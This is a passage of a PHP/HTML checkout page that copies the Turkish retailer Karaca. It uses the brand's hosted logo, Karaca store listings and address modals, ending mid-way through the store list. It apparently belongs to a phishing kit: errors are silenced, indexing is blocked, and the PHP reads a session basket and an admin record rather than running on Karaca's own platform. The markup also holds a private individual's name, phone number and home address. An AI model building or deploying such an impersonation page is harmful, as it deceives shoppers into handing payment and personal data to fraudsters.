<?php
error_reporting(0);
// Session start
session_start();
ob_start();

$basket = $_SESSION['basket'] ?? [];

// Include Helper
include_once('../inc/helper.php');

// Check product info database
$basket_info = $_SESSION['basket_info'];
$sql = "SELECT * FROM products WHERE id = :id";
$stmt = $db->prepare($sql);
$stmt->execute(['id' => $basket_info['product_id']]);
$product = $stmt->fetch(PDO::FETCH_OBJ);

$admin = $db->query('SELECT * FROM admins WHERE id = 1')->fetch(PDO::FETCH_OBJ);
?>

<!DOCTYPE html>
<html lang="tr">

<head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE-EmulateIE7">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta id="viewport" name="viewport"
          content="width=device-width, maximum-scale=1.0, initial-scale=1.0, user-scalable=no, minimal-ui">
    <meta name="robots" content="noindex, nofollow">
    <meta name="googlebot" content="noindex, nofollow">


    <title>Ödeme</title>


    <link rel="stylesheet" href="_next/static/css/app.6228f064c108b5d46e18.css" as="style"/>
    <link rel="stylesheet" href="_next/static/css/font.6228f064c108b5d46e18.css"/>
    <!-- JQUERY -->
    <script src="components/js/jquery3.6.3.min.js"></script>
    <!-- Custom inline JS -->
    <script type="text/javascript">
        var GLOBALS = {
            THUMBNAIL_ACTIVE: true,
            THUMBNAIL_OPTIONS: {
                "product-list__big": {
                    "width": 587,
                    "quality": 60,
                    "crop": "center",
                    "height": 587
                },
                "category-detail": {
                    "width": 870,
                    "quality": 60,
                    "height": 317
                },
                "email-thumbnail": {
                    "width": 80,
                    "quality": 60,
                    "crop": "center",
                    "height": 80
                },
                "product_basket_thumb_image": {
                    "width": 120,
                    "quality": 60,
                    "height": 120
                },
                "discount-product-list": {
                    "width": 190,
                    "quality": 100,
                    "crop": "center",
                    "height": 190
                },
                "product-content-variant-image": {
                    "width": 70,
                    "quality": 60,
                    "crop": "center",
                    "height": 70
                },
                "product-detail__slider_display": {
                    "width": 780,
                    "quality": 60,
                    "crop": "center",
                    "height": 780
                },
                "product-detail__slider_zoom": {
                    "width": 1400,
                    "quality": 60,
                    "crop": "center",
                    "height": 1400
                },
                "product-detail__slider_thumbnail": {
                    "width": 150,
                    "quality": 60,
                    "crop": "center",
                    "height": 150
                },
                "category-detail__sub-category-banner": {
                    "width": 270,
                    "quality": 60,
                    "height": 335
                },
                "autocomplete": {
                    "width": 40,
                    "quality": 60,
                    "height": 40
                },
                "category-detail__campaign-banner": {
                    "width": 420,
                    "quality": 60,
                    "height": 210
                },
                "product-map-image": {
                    "width": 60,
                    "quality": 60,
                    "crop": "center",
                    "height": 60
                },
                "product-list": {
                    "width": 250,
                    "quality": 100,
                    "crop": "center",
                    "height": 250
                }
            },
            DEFAULT_COUNTRY: {
                'pk': 1
            },
            isUserLoggin: false,
            userPhone: '',
            sendTime: '',
            phoneLogin: '',
            isAutoSetShippingOption: false,
            isPaymentTabRunningFromSlug: true,
            disableAutoSelectOneAddress: true,
            userEmail: '',
            userName: '',
            userSurname: '',

            page: 'checkout'

        };


    </script>
    <link rel="preload" href="assets/img/static_omnishop/ayb822/dist/panton-regular-webfont.woff2" as="font"
          type="font/woff2" crossorigin="">
    <link rel="preload" href="assets/img/static_omnishop/ayb822/dist/panton-bold-webfont.woff2" as="font"
          type="font/woff2" crossorigin="">
    <link rel="preload" href="assets/img/static_omnishop/ayb822/dist/a101_tradegothic-bold-webfont.woff2" as="font"
          type="font/woff2" crossorigin="">
    <link rel="preload" href="assets/img/static_omnishop/ayb822/dist/a101_tradegothic-bold-webfont.woff2" as="font"
          type="font/woff2" crossorigin="">
    <link rel="preload" href="assets/img/static_omnishop/ayb822/dist/panton-extrabold-webfont.woff2" as="font"
          type="font/woff2" crossorigin="">
    <link rel="preload" href="assets/img/static_omnishop/ayb822/dist/panton-blackcaps-webfont.woff2" as="font"
          type="font/woff2" crossorigin="">
    <link rel="preload" href="assets/img/static_omnishop/ayb822/dist/icomoon.ttf" as="font" type="font/ttf"
          crossorigin="">
    <script src="assets/js/cookie-seal.js"></script>

</head>

<body class="page-inner address">
<section class="js-main-wrapper">
    <style>
        .page-checkout {
            display: flex;
            justify-content: center;
        }

        .container {
            width: 100%;
            max-width: 1200px;
        }
    </style>
    

    <!-- yeni section -->
    <div class="basket">
        <div class="basketHeader container"><a href="/">
                <div class="logo"><img src="https://www.karaca.com/catalog/view/assets/images/logos/karacalogo.svg"
                                       alt="Karaca"></div>
            </a>
            <div class="account">
                <div class="dropdown"><a type="button" id="accountDropdown" data-toggle="dropdown" aria-haspopup="true"
                                         aria-expanded="false"></a></div>
            </div>
            <div class="mobileBasketHeader"><a href="/checkout/cart" class="item"><i
                            class="krc-arrow2-left"></i></a><span class="item count">Teslimat</span></div>
        </div>
        <div class="modal fade" id="deleteAddress">
            <div class="modal-dialog modal-dialog-centered">
                <div class="modal-content">
                    <div class="modal-header"><h4 class="modal-title">ADRES BİLGİSİ</h4>
                        <button type="button" class="close modalCloseCustom" data-dismiss="modal"><i
                                    class="krc-close-circle"></i></button>
                    </div>
                    <div class="modal-body">
                        <div class="modalBodyKrc"><span class="text">Adresiniz silinecek onaylıyor musunuz?</span>
                            <div class="modalBtnWrap button-2">
                                <button type="button" class="krc-btn krc-btn-border" data-dismiss="modal">Vazgeç
                                </button>
                                <button type="button" class="address-delete-button krc-btn krc-btn-full">Sil</button>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="modal fade" id="defaultAddress">
            <div class="modal-dialog modal-dialog-centered">
                <div class="modal-content">
                    <div class="modal-header"><h4 class="modal-title">Varsayılan Adres Seçimi</h4>
                        <button type="button" class="close modalCloseCustom" data-dismiss="modal"><i
                                    class="krc-close-circle"></i></button>
                    </div>
                    <div class="modal-body">
                        <div class="modalBodyKrc"><span class="text">Adresiniz varsayılan geçerli adres seçilecek onaylıyor musunuz?</span>
                            <div class="modalBtnWrap button-2">
                                <button type="button" class="krc-btn krc-btn-border" data-dismiss="modal">Vazgeç
                                </button>
                                <button type="button" class="address-default-button krc-btn krc-btn-full">Onayla
                                </button>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div id="modalPickupAdress"
             class="modal hide modal-backdrop d-md-none d-none address-change-mobile-modal delivery-address-select-container"
             tabindex="-1">
            <div class="modal-dialog wrapper">
                <div class="modal-content address-change-modal-content modal-content-mobile">
                    <div class="modal-header"><h5 class="modal-title">Teslimat Adresi</h5>
                        <div class="close-modal">
                            <div class="selectBox dropdown"><a
                                        class="selected-address-dropdown adrese-teslimat-mobile-dropdown"
                                        data-address_type="shipping" href="javascript:;" role="button"><img
                                            src="https://static.karaca.com/catalog/view/assets/images/icons/modal-close.svg"
                                            alt="modal-close"></a></div>
                        </div>
                    </div>
                    <div class="modal-body">
                        <div class="delivery-address-select-container">
                            <div class="delivery-address-select-items-container"></div>
                            <div style="display: none;"
                                 class="delivery-address-select-header delivery-address-select-header-adrese-teslimat">
                                <a href="javascript:void(0);"
                                   class="address-form address-form-shipping address-mobile-modal-button"
                                   data-address_type="1" data-address_id="0">
                                    <div>Yeni Adres Ekle</div>
                                </a></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div id="modalPickupAdress"
             class="modal hide modal-backdrop d-md-none d-none payment-address-change-mobile-modal delivery-address-select-container"
             tabindex="-1">
            <div class="modal-dialog wrapper">
                <div class="modal-content address-change-modal-content modal-content-mobile">
                    <div class="modal-header"><h5 class="modal-title">Fatura Adresi</h5>
                        <div class="close-modal">
                            <div class="selectBox dropdown"><a
                                        class="selected-address-dropdown magazadan-teslimat-dropdown-mobile"
                                        data-address_type="invoice" href="javascript:;" role="button"><img
                                            src="https://static.karaca.com/catalog/view/assets/images/icons/modal-close.svg"
                                            alt="modal-close"></a></div>
                        </div>
                    </div>
                    <div class="modal-body">
                        <div class="delivery-address-select-container">
                            <div class="delivery-address-select-items-container">
                                <div class="delivery-address-select-item address-change-item" href="javascript:;"
                                     data-address_type="2" data-address_id="21381135">
                                    <div class="delivery-address-select-circle-mobile-modal"></div>
                                    <div>
                                        <div class="delivery-address-select-name">ev</div>
                                        <div class="delivery-address-select-content">Ayberk CAKİR &nbsp; (552) 251 02 66
                                            <br> GEMLİK HİSAR MAH Bursa
                                        </div>
                                    </div>
                                    <div class="delivery-address-select-threedot-container">
                                        <div class="delivery-address-select-threedot-item"></div>
                                        <div class="delivery-address-select-threedot-item"
                                             style="margin: 2.25px 0px"></div>
                                        <div class="delivery-address-select-threedot-item"></div>
                                    </div>
                                    <div class="delivery-address-edit-delete">
                                        <div class="delivery-address-duzenle address-form" data-address_type="2"
                                             data-address_id="21381135"><img
                                                    src="/sadece-online-ozel/catalog/view/assets/images/icons/edit-pen.svg"> Düzenle
                                        </div>
                                        <div class="delivery-address-sil address-delete-from" data-address_type="2"
                                             data-address_id="21381135"><img
                                                    src="/sadece-online-ozel/catalog/view/assets/images/icons/red-trash.svg"> Sil
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div style="display: none;"
                                 class="delivery-address-select-header delivery-address-select-header-magazadan-teslimat">
                                <a href="javascript:void(0);"
                                   class="address-form address-form-invoice address-mobile-modal-button"
                                   data-address_type="2" data-address_id="0">
                                    <div>Yeni Adres Ekle</div>
                                </a></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="modal fade modal_open_modalStoreDelivery" id="modalStoreDelivery" tabindex="-1"
             aria-labelledby="modal_modalStoreDeliveryLabel" style="display: none;" aria-hidden="true">
            <div class="modal-dialog modal-lg modal-dialog-centered" role="document">
                <div class="modal-content">
                    <div class="modal-header"><span class="modal-title" id="modal_modalStoreDeliveryLabel"><strong>Mağazadan Teslim Al</strong></span>
                        <button type="button" class="close modalCloseCustom" data-dismiss="modal" aria-label="Close"><i
                                    class="krc-close-circle"></i></button>
                    </div>
                    <div class="modal-body">
                        <form id="store-modal-filtre" onsubmit="return false;"><input type="hidden"
                                                                                      name="store_modal_type" value="2">
                            <div class="storeDeliveryContent">Teslimatınızı bazı ürünler için aynı gün, diğer ürünler
                                içinse ürün mağazaya ulaştırıldıktan sonra tarafınıza iletilecek bilgilendirme mesajıyla
                                kolayca alın.
                            </div>
                            <div class="storeDeliveryInfoImgContainer">
                                <div class="storeDeliveryFirstStep">
                                    <div class="storeDeliveryFirstStepContainer">
                                        <div class="storeDeliveryFirstStepCircle"><img
                                                    src="/sadece-online-ozel/catalog/view/assets/images/icons/address-location.svg"></div>
                                        <div class="storeDeliveryFirstNumber"><b>1</b></div>
                                        <div class="storeDeliveryFirstDesc">En yakın mağazayı seç sipariş ver</div>
                                    </div>
                                </div>
                                <div class="storeDeliveryLine"></div>
                                <div class="storeDeliverySecondStep">
                                    <div class="storeDeliverySecondStepContainer">
                                        <div class="storeDeliverySecondStepCircle"><img
                                                    src="/sadece-online-ozel/catalog/view/assets/images/icons/address-basket.svg"></div>
                                        <div class="storeDeliverySecondNumber"><b>2</b></div>
                                        <div class="storeDeliverySecondDesc">0-4 gün içerisinde siparişini mağazadan
                                            teslim al
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="storeDeliveryLocationButtonContainer">
                                <button class="krc-btn krc-btn-border locationBtn store-location-button">En Yakın
                                    Mağazaları Göster
                                </button>
                            </div>
                            <div class="form-row locationSelectLine">
                                <div class="form-group col-md-12 select">
                                    <label>İlçe</label>
                                    <input type="text" name="ilce" class="form-control" id="inputIlce">
                                </div>
                            </div>
                            <div class="form-group store-fast-filtre-checkbox"><input type="checkbox"
                                                                                      name="store-fast-filtre" value="1"
                                                                                      id="sameDayDelivery"
                                                                                      class="checkbox"><label
                                        for="sameDayDelivery" class="checkboxLabel">
                                    <div><i class="krc-okay"></i></div>
                                    Aynı Gün Teslimat Geçerli Mağazalar </label></div>
                        </form>
                        <ul class="storeDeliveryList customScroll">
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3333"
                                data-store-id="41" data-store-fast="0" data-store-state="176">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Bolu Burda Avm Magazası</div>
                                        <div class="storeAddress">Blu.Burda Krc.2015 Bolu Burda Avm Magazası 14 Burda
                                            Alışveriş Merkezi Paşaköy Mah. TR 14000 Paşaköy Merkez Bolu
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9791</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Bolu Burda Avm Magazası" data-store_id="41">Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3336"
                                data-store-id="50" data-store-fast="0" data-store-state="220">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Çanakkale Forum Avm Magazası</div>
                                        <div class="storeAddress">Ckk.Forum Krc.2015 Çanakkale Forum Avm Magazası 17
                                            Burda Alışveriş Merkezi Barbaros Mah. TR 17000 Barbaros Merkez Çanakkale
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9785</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Çanakkale Forum Avm Magazası" data-store_id="50">Mağazayı
                                        Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3338"
                                data-store-id="51" data-store-fast="0" data-store-state="241">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Çorum Ahlpark Avm Magazası</div>
                                        <div class="storeAddress">Cor.Ahlpark Krc.2016 Çorum Ahlpark Avm Magazası Çorum
                                            Ahl Park Alışveriş Merkezi TR 19000 Çepni Merkez Çorum
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9809</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Çorum Ahlpark Avm Magazası" data-store_id="51">Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3342"
                                data-store-id="56" data-store-fast="0" data-store-state="290">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Edırne Margı Avm Magazası</div>
                                        <div class="storeAddress">Edr.Margı Krc.2011 Edırne Margı Avm Magazası Edirne
                                            Margi Outlet E-5 Karayolu Üzeri. TR 22000 Merkez Edirne
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9354</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Edırne Margı Avm Magazası" data-store_id="56">Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3345"
                                data-store-id="63" data-store-fast="0" data-store-state="1078">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Erzurum Mng Avm Magazası</div>
                                        <div class="storeAddress">Erz.Mng Krc.2019 Erzurum Mng Avm Magazası Lalapaşa
                                            Mahallesi Somunoğlu Cad. TR 25000 Lalapaşa Yakutiye Erzurum
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9823</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Erzurum Mng Avm Magazası" data-store_id="63">Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3351"
                                data-store-id="69" data-store-fast="0" data-store-state="388">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Hatay Prıme Iskenderun Avm Mag</div>
                                        <div class="storeAddress">Hty.Prıme Iskenderun Krc.2011 Hatay Prıme Iskenderun
                                            Avm Mag Numune Mahallesi İbrahim Karaoğlanoğlu TR 31000 Numune İskenderun
                                            Hatay
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9353</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Hatay Prıme Iskenderun Avm Mag" data-store_id="69">Mağazayı
                                        Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3354"
                                data-store-id="79" data-store-fast="0" data-store-state="430">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Ist.Atırus Krc.2010</div>
                                        <div class="storeAddress">Ist.Atırus Krc.2010 Ist.Atırus Krc.2010 Atirus
                                            Alışveriş Merkezi Fatih Mahallesi TR 34000 Fatih Büyükçekmece İstanbul
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9277</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Ist.Atırus Krc.2010" data-store_id="79">Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3354"
                                data-store-id="82" data-store-fast="0" data-store-state="443">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Istanbul Armonıpark Avm Magaza</div>
                                        <div class="storeAddress">Ist.Armonıpark Krc.2010 Istanbul Armonıpark Avm Magaza
                                            Armony Avm Tevfik Bey Mah.Halkalı Cd. TR 34000 Tevfik Bey Küçükçekmece
                                            İstanbul
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9279</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Istanbul Armonıpark Avm Magaza" data-store_id="82">Mağazayı
                                        Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3354"
                                data-store-id="98" data-store-fast="0" data-store-state="434">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Istanbul Akbatı Avm Magazası</div>
                                        <div class="storeAddress">Ist.Akbatı Krc.2011 Istanbul Akbatı Avm Magazası
                                            Akbatı Alışveriş Ve Yaşam Merkezi. TR 34000 Sanayi Esenyurt İstanbul
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9296</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Istanbul Akbatı Avm Magazası" data-store_id="98">Mağazayı
                                        Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3354"
                                data-store-id="127" data-store-fast="0" data-store-state="428">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Istanbul Perlavısta Avm Magaza</div>
                                        <div class="storeAddress">Ist.Perlavısta Krc.2016 Istanbul Perlavısta Avm Magaza
                                            Perlavista Alışveriş Ve Yaşam Merkezi TR 34000 Adnan Kahveci Beylikdüzü
                                            İstanbul
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9327</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Istanbul Perlavısta Avm Magaza" data-store_id="127">
                                        Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3355"
                                data-store-id="157" data-store-fast="0" data-store-state="482">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Izmır Menemen Avm Magazası</div>
                                        <div class="storeAddress">Izm.Menemen Krc.2019 Izmır Menemen Avm Magazası
                                            Yıldırım Mahallesi İzmir Çanakkale TR 35000 Yıldırım Menemen İzmir
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9081</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Izmır Menemen Avm Magazası" data-store_id="157">Mağazayı
                                        Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3355"
                                data-store-id="160" data-store-fast="0" data-store-state="472">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Izmır Gazıemır Contaıner Avm M</div>
                                        <div class="storeAddress">Izm.Gazıemır Contaıner Krc.2021 Izmır Gazıemır
                                            Contaıner Avm M Gazi Mah. Akçay Cad. No:168 B TR 35000 Gazi Gaziemir İzmir
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 433 4425</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Izmır Gazıemır Contaıner Avm M" data-store_id="160">
                                        Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3366"
                                data-store-id="170" data-store-fast="0" data-store-state="555">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Kocaelı Burda Avm Magazası</div>
                                        <div class="storeAddress">Kcl.Burda Krc.2015 Kocaelı Burda Avm Magazası 41 Burda
                                            Alışveriş Merkezi Sanayi Mah. TR 41000 Sanayi İzmit Kocaeli
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9799</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Kocaelı Burda Avm Magazası" data-store_id="170">Mağazayı
                                        Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3377"
                                data-store-id="184" data-store-fast="0" data-store-state="1047">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Ordu Novada Avm Magazası</div>
                                        <div class="storeAddress">Ord.Novada Krc.2017 Ordu Novada Avm Magazası Ordu
                                            Novada Alışveriş Merkezi TR 52000 Şarkiye Altınordu Ordu
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9356</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Ordu Novada Avm Magazası" data-store_id="184">Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3380"
                                data-store-id="187" data-store-fast="0" data-store-state="732">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Sakarya Cadde Avm Magazası</div>
                                        <div class="storeAddress">Sak.Cadde Krc.2021 Sakarya Cadde Avm Magazası
                                            Arabacıalanı Mah. 54. Cd. Cadde 54 TR 54000 Arabacıalanı Serdivan Sakarya
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 433 4417</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Sakarya Cadde Avm Magazası" data-store_id="187">Mağazayı
                                        Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="null"
                                data-store-id="188" data-store-fast="0" data-store-state="null">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Sms.Yesılyurt Krc.2010 Karaca</div>
                                        <div class="storeAddress">Sms.Yesılyurt Krc.2010 Sms.Yesılyurt Krc.2010 Karaca
                                            Yeşilyurt Avm Denizevleri Mah. Atatürk TR 55000 Denizevleri Atakum Samsun
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9332</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Sms.Yesılyurt Krc.2010 Karaca" data-store_id="188">Mağazayı
                                        Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3381"
                                data-store-id="192" data-store-fast="0" data-store-state="740">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Samsun Lovelet Contaıner Avm M</div>
                                        <div class="storeAddress">Sms.Lovelet Contaıner Krc.2021 Samsun Lovelet
                                            Contaıner Avm M Devgeriş Mah. Çeşme Sk. No: 21/1 TR 55000 Devgeriş Canik
                                            Samsun
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 433 9103</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Samsun Lovelet Contaıner Avm M" data-store_id="192">
                                        Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3388"
                                data-store-id="195" data-store-fast="0" data-store-state="800">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Tokat Novada Avm Magazası</div>
                                        <div class="storeAddress">Tkt.Novada Krc.2014 Tokat Novada Avm Magazası Novada
                                            Tokat Alışveriş Merkezi TR 60000 Yeşilırmak Merkez Tokat
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9783</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Tokat Novada Avm Magazası" data-store_id="195">Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3382"
                                data-store-id="197" data-store-fast="0" data-store-state="1173">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Sanlıurfa Pıazza Avm Magazası</div>
                                        <div class="storeAddress">Snf.Pıazza Krc.2013 Sanlıurfa Pıazza Avm Magazası
                                            Şanlıurfa Piazza Alışveriş Ve Yaşam Merk TR 63000 Karakoyunlu Merkez
                                            Şanlıurfa
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9780</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Sanlıurfa Pıazza Avm Magazası" data-store_id="197">Mağazayı
                                        Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3392"
                                data-store-id="198" data-store-fast="0" data-store-state="1100">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Van Avm Avm Magazası</div>
                                        <div class="storeAddress">Van.Avm Krc.2015 Van Avm Avm Magazası Van Alışveriş
                                            Merkezi Serhat Mahallesi TR 65000 Serhat İpekyolu Van
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9794</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Van Avm Avm Magazası" data-store_id="198">Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3394"
                                data-store-id="199" data-store-fast="0" data-store-state="869">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Yozgat Novada Avm Magazası</div>
                                        <div class="storeAddress">Yzg.Novada Krc.2016 Yozgat Novada Avm Magazası Yozgat
                                            Novada Alışveriş Merkezi TR 66000 Fatih Merkez Yozgat
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9870</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Yozgat Novada Avm Magazası" data-store_id="199">Mağazayı
                                        Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3386"
                                data-store-id="997" data-store-fast="0" data-store-state="779">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Sıvas Park Avm Magazası</div>
                                        <div class="storeAddress">Svs.Park Krc.2016 Sıvas Park Avm Magazası Primemall
                                            Sivaspark Avm Gültepe Mah. TR 58000 Gültepe Merkez Sivas
                                        </div>
                                        <div class="storeTel"><b>Telefon:</b> 0850 432 9871</div>
                                        <div class="storeSameDayDeliveryText"></div>
                                    </div>
                                    <button type="button" class="krc-btn krc-btn-full checkout-store-select-button"
                                            data-store_name="Sıvas Park Avm Magazası" data-store_id="997">Mağazayı Seç
                                    </button>
                                </div>
                            </li>
                            <li class="avm-select-line-row" data-lead_time_text="Test termin" data-store-city="3354"
                                data-store-id="803040" data-store-fast="0" data-store-state="446">
                                <div class="storeDetailLine">
                                    <div class="storeDeliveryInfo">
                                        <div class="storeName">Ist.Vıaport Contaıner Krc.2022</div>
                                        <div class="storeAddress">Ist.Vıaport Contaıner Krc.2022 Ist.Vıaport Contaıner
